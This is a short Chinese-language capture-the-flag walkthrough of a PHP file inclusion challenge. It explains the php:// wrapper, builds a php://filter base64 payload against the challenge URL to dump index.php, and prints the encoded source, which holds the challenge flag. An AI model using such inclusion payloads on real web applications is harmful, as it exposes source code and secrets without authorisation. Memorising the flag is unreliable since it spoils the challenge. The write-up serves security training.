1.打开网页,点击click me? no链接
URL栏里显示:http://114.67.246.176:15077/index.php?file=show.php,可能存在文件包含漏洞
这里介绍一下:php:// 协议
条件:
allow_url_fopen:off/on
allow_url_include :仅php://input php://stdin php://memory php://temp 需要on
作用:
php:// 访问各个输入/输出流(I/O streams),在CTF里经常使用的是php://filter和php://input,php://filter用于读取源码,php://input用于执行php代码。
2构造payload:
http://114.67.246.176:15077/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
77u/PGh0bWw+DQogICAgPHRpdGxlPkJ1Z2t1LXdlYjwvdGl0bGU+DQogICAgDQo8P3BocA0KCWVycm9yX3JlcG9ydGluZygwKTsNCglpZighJF9HRVRbZmlsZV0pe2VjaG8gJzxhIGhyZWY9Ii4vaW5kZXgucGhwP2ZpbGU9c2hvdy5waHAiPmNsaWNrIG1lPyBubzwvYT4nO30NCgkkZmlsZT0kX0dFVFsnZmlsZSddOw0KCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpew0KCQllY2hvICJPaCBubyEiOw0KCQlleGl0KCk7DQoJfQ0KCWluY2x1ZGUoJGZpbGUpOyANCi8vZmxhZzpmbGFne2E2MTc3MDZiY2U0NWJkZGFhY2U5NmQ0NDYyYjhmODkxfQ0KPz4NCjwvaHRtbD4NCg==
相当于得到了源代码进行base64编码之后的结果,只需进行base64解码即可获取源代码
得到flag。